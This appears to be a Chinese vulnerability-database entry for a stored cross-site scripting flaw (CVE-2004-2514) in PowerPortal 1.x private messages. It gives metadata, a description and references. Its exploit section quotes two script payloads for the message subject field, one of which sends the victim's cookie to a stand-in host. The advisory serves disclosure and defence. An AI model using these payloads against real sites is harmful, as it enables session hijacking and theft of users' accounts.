PowerPortal私人信息HTML注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108093 漏洞类型 跨站脚本
发布时间 2004-07-30 更新时间 2006-01-24
CVE编号 CVE-2004-2514 CNNVD-ID CNNVD-200412-554
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/24340
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-554
|漏洞详情
PowerPortal1.x版本的modules/private_messages/index.php存在跨站脚本(XSS)漏洞。远程攻击者可以借助(1)SUBJECT或(2)MESSAGE字段注入任意web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/10835/info

A vulnerability is reported for PowerPortal which may make it prone to HTML injection attacks. The problem is said to occur due to a lack of sufficient sanitization performed on private message data.

Specifically, when creating PowerPortal private messages, the subject field may not be sufficiently sanitized of malicious content. This may make it possible for an attacker to place HTML or script code within the subject field of a private PowerPortal message for another user.

Subject: <script>alert(document.cookie);</script>
Subject: <script>document.location='http://www.example.com/?'+document.cookie</script>
|参考资料

来源:XF
名称:powerportal-private-message-xss(16838)
链接:http://xforce.iss.net/xforce/xfdb/16838
来源:BID
名称:10835
链接:http://www.securityfocus.com/bid/10835
来源:www.securiteam.com
链接:http://www.securiteam.com/unixfocus/5TP0O2ADFK.html
来源:OSVDB
名称:8319
链接:http://www.osvdb.org/8319
来源:SECTRACK
名称:1010802
链接:http://securitytracker.com/id?1010802